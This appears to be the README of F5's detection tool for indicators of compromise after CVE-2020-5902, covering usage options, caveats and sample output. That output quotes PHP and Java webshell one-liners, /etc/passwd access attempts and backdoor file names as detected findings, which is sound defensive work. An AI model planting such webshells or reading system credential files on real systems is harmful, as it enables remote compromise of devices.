This script is intended to be executed locally on an F5 BIG-IP in Advanced Shell (bash) by a user with root privileges; it is not intended to be run in any other setting. Note: Appliance Mode does not allow access to Advanced Shell, and therefore this tool cannot be run on such systems.
The script examines the BIG-IP for the Indicators of Compromise associated with CVE-2020-5902 which were known to F5 Networks at the time of authoring. The script collates these IoCs and presents a report as an overview you can use to inform your determination of the best path forward. If this tool uncovers any IoCs, you should manually examine and confirm them, then follow your own documented procedures for handling suspected compromised systems. F5 specific guidance may be found in K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system.
Note: If you have any uncertainty or doubt as to the integrity of any system, the cautious approach is to consider the system compromised and to follow your internal procedures for handling a compromised system. Note also that any information contained on a compromised system should itself be considered compromised. This includes, but is not limited to, passwords, private keys, digital certificates, configurations, logs, etc.
It must be noted that IoCs may no longer be present either due to age (for example, by log rotation schedules) or removal by a sufficiently skilled adversary. As exploitation of CVE-2020-5902 potentially results in remote code execution as the root user, a skilled attacker would be free to sanitize the system of traces after exploitation.
Note also that an attacker could poison any binary on the system, including python. Reasonable steps have been taken to avoid the possibility of this; however, you must determine your level of trust in the output of this tool on any system suspected to be compromised.
On BIG-IP versions that include sys-eicheck (13.1.0 onward), this tool offers the administrator the opportunity to check the running system against the original installation RPMs to look for any file modifications in an attempt to ensure the integrity of the system commands this tool relies upon. Note that sys-eicheck can be run on all platforms regardless of FIPS capability.
On earlier versions the tool does not currently include this functionality and will run without checking the originally installed system binaries for tampering.
The sha384 sum of this version of CVE-2020-5902_bigip_ioc_checker.py is: 1583bc8b6a52c71bb49fce26c6f67be2c65aa1f42c433a13fc79616f01a84994b76eaa8ff4bc19ef7833b8f145ba6136
You should only download these files from the F5 DevCentral GitHub repository
Note that the authoritative source of information on CVE-2020-5902 is always the F5 Security Advisory, K52145254: TMUI RCE vulnerability CVE-2020-5902
Simply download the file CVE-2020-5902_bigip_ioc_checker.py
to the target BIG-IP and run it using the python installation already present on BIG-IP.
Example:
[root@hostname:Active:Standalone] tmp # python CVE-2020-5902_bigip_ioc_checker.py -h
USAGE: python CVE-2020-5902_bigip_ioc_checker.py
You can use the following options <-iajylcbwut> to skip some checks:
Option: -i or --skip_sys-eicheck
[+] Skip using the sys_eicheck utility to scan the BIG-IP system for any unexpected changes to the system software.
[+] Please refer to https://support.f5.com/csp/article/K00029945for more details about the sys-eicheck utility.
[+] The sys-eicheck utility may take several minutes to finish.
Option: -a or --skip_audit_check [+] Skip scanning the audit log for malicious activities.
Option: -j or --skip_journal_check [+] Skip scanning the journal log for malicious activities.
Option: -y or --skip_systems_check [+] Skip scanning /config/bigip_user.conf to look for malicious users.
Option: -l or --skip_alias_check [+] Skip scanning /config/bigip_*.conf for malicious alias definition.
Option: -c or --skip_catalina_check [+] Skip scanning the tomcat catalina.out log for malicious activities.
Option: -b or --skip_bigipstartup_check [+] Skip checking if /config/startup contains blacklisted words.
Option: -w or --skip_webshell_check [+] Skip checking Files created after 2020 Jun 29 in the /usr/local/www/ to look for possible webshell files.
Option: -u or --skip_autostart_check [+] Skip checking Files created after 2020 Jun 29 in /etc/ to look for the possible autostart script.
Option: -t or --skip_tmp_check [+] Skip checking Files created after 2020 Jun 29 in /tmp
Option: -p or --disable_color_print [+] Disable color print, better for saving result
Option: -q or --bigiq_cmd_check [+] Run BIG-IQ compatible malicious command check
Option: -h or --help [+] Print usage
If a BIG-IP is managed by BIG-IQ or another automation/management system, it may receive bash commands from the BIG-IQ or another automation/management system. Some of the bash commands have the base64 encoding script embedded. Those bash commands logged in the BIG-IP audit logs could lead the IoC Detection Tool to report false positives notification: "!! IoC pattern malicious bash command found". To reduce the falses positives, you can use -q option to make the IoC Detection Tool ignore the legitimate base64 encoded script in the audit logs.
Upgrading the system may update the timestamps on files in /usr/local/www/ which may result in a false positive, for example, if the fixed software was recently installed.
If any results are returned for any of the file creation date checks, in /usr/local/www/, /etc/, and /tmp/, the files should be examined to determine their legitimacy.
It is possible to still find Indication of Compromise from the journalctl logs after an upgrade to a fixed version or after applying the workaround. Please review the time stamp of the logs should they be present and verify they happened before the upgrade or applying the workaround.
# python CVE-2020-5902_bigip_ioc_checker.py -iqa
>>>> Skip sys-eicheck check
>>>> Run BIG-IQ compatible malicious command check
>>>> Skip audit log check
CVE-2020-5902 Indicators of Compromise checker. False positive reports are possible and all results should be manually verified.
[+] Version 13.1.0 Build 0.0.1868 CVE-2020-5902 Fixed: False
!! IoC pattern ['/etc/fakefile', '/etc/passwd', '/etc/fakefile1'] access denied in file /var/log/tomcat/catalina.out
!! IoC pattern ['/config/bigip_base.conf'] access denied in file /var/log/tomcat/catalina.out.1
!! IoC pattern Possible backdoor echo "<?php eval(\$_REQUEST[09ede7]);" > /usr/local/www/xui/common/css/webshell.php in file /config/startup
!! IoC pattern Possible backdoor echo "Runtime.getRuntime().exec("cmd.exe /C " + cmd);" > /usr/local/www/xui/common/css/webshell.jsp in file /config/startup
[+]========================== auto start script checking ==========================
!! Files created in /etc/ after 2020 Jun 29, need to check if those are malicious daemon startup script
95291 1 -rw-r--r-- 1 root root 0 Jul 20 14:49 /etc/rc.d/init.d/autostartbackdoor
104847 4 -rw------- 1 root root 199 Jul 13 10:46 /var/spool/cron/root
[+]================================ /tmp/ checking ================================
!! File /tmp/backdoor_curl could be a malicous script
!! File /tmp/CVE-2020-5902_bigip_ioc_checker.py could be a malicous script
!! Files created in /tmp/ after 2020 Jun 29, need to check if those are malicious scripts
18491 40 -rw-r--r-- 1 root root 38066 Jul 20 14:57 /tmp/CVE-2020-5902_bigip_ioc_checker.py
18497 1 -rw-r--r-- 1 root root 0 Jul 20 14:49 /tmp/backdoor_new
[+]============================== webshell checking ==============================
!! Files created in /usr/local/www/ after 2020 Jun 29, need to check if those are webshell or information leakage
243368 4 -rw-r--r-- 1 root root 33 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.php
243367 4 -rw-r--r-- 1 root root 33 Jul 17 08:30 /usr/local/www/xui/common/css/css.php
243369 4 -rw-r--r-- 1 root root 46 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.jsp
F5 provides the CVE-2020-5902 IoC Detection Tool to help its customers analyze their F5 devices outside of iHealth for certain indicators of compromise related to CVE-2020-5902. Please note, however, that:
-
The CVE-2020-5902 IoC Detection Tool is not comprehensive, nor is it intended to be: it does not identify all possible indicators of compromise, but only a select group that F5 has found to be generally reliable based on its internal analyses of compromised F5 devices.
-
Not all compromised F5 devices show the same indicators and attackers may be able to remove traces of their work. It is not possible to prove that any device has not been compromised; if there is any uncertainty, additional analysis may be required and/or you may want to consult with your security team.
-
To avoid undue interruption to a user’s business operations, the CVE-2020-5902 IoC Detection Tool should not be operated during peak traffic hours and should instead generally be used during users’ regular maintenance windows.
-
If indicators of compromise are identified, F5 recommends that users follow their documented internal incident response procedures. F5 has provided general considerations and guidance for when a security compromise on a BIG-IP system is suspected in K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system. Additionally, users can contact F5 directly for additional support via the Customer Support Portal or other standard channels.
The CVE-2020-5902 IoC Detection Tool is made available for F5 users’ convenience and is provided on an “as is” basis under the terms of the Apache License. You use the CVE-2020-5902 IoC Detection Tool at your own risk.
Copyright © 2020 F5 Networks, Inc.
Licensed under the Apache License, Version 2.0 (the “License”); you may not use the CVE-2020-5902 IoC Detection Tool except in compliance with the License. You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.